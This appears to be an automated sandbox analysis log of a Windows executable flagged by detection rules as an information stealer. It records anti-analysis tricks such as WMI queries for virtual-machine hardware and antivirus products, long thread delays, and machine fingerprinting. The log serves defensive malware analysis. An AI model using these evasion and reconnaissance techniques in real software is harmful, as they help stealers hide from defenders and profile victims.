Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04C7E800 push E40647AAh; iretd	0_2_04C7E805
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04DFA288 push esp; iretd	0_2_04DFA289
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E088F5 push ds; ret	0_2_04E088F6
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E090D4 push ss; ret	0_2_04E090D6
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E09095 push ss; ret	0_2_04E09097
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E08877 push ds; ret	0_2_04E08878
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E08934 push ds; ret	0_2_04E08935
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Code function: 0_2_04E07115 push edi; ret	0_2_04E07116

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

File created: C:\Users\user\AppData\Roaming\928100\InstalledSoftware.txt

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Memory allocated: E20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Memory allocated: 2650000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Memory allocated: 4650000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598993	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597260	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597147	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596701	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595916	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595682	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595232	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595112	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594996	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594645	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594093	Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Window / User API: threadDelayed 3304			Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Window / User API: threadDelayed 6293			Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -36893488147419080s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599874s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599765s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598993s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598886s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598773s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598137s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597921s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597260s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597147s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596701s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596483s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -596156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595916s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595682s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595468s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595232s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -595112s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594996s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594645s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594312s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe TID: 7436	Thread sleep time: -594093s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599874	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599765	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598993	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598886	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598773	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598137	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597374	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597260	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597147	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596701	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596593	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596483	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596374	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 596156	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595916	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595682	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595468	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595232	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 595112	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594996	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594645	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594531	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594421	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Thread delayed: delay time: 594093	Jump to behavior

Source: B5U2ccQ8H1.exe, 00000000.00000002.1815490202.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $fqEmultipart/form-data; boundary=------------------------8dc9ebfd23c8782<
Source: B5U2ccQ8H1.exe, 00000000.00000002.1814837644.000000000094D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Code function: 0_2_00E2B2B8 LdrInitializeThunk,

0_2_00E2B2B8

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Memory allocated: page read and write | page guard

Jump to behavior

Language, Device and Operating System Detection

Yara detected Telegram Recon

Source: Yara match

File source: B5U2ccQ8H1.exe, type: SAMPLE

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Queries volume information: C:\Users\user\Desktop\B5U2ccQ8H1.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: B5U2ccQ8H1.exe, 00000000.00000002.1824310072.0000000005F87000.00000004.00000020.00020000.00000000.sdmp, B5U2ccQ8H1.exe, 00000000.00000002.1814837644.00000000008E2000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\B5U2ccQ8H1.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected RL STEALER

Source: Yara match	File source: B5U2ccQ8H1.exe, type: SAMPLE
Source: Yara match	File source: 0.0.B5U2ccQ8H1.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1815490202.0000000002A84000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
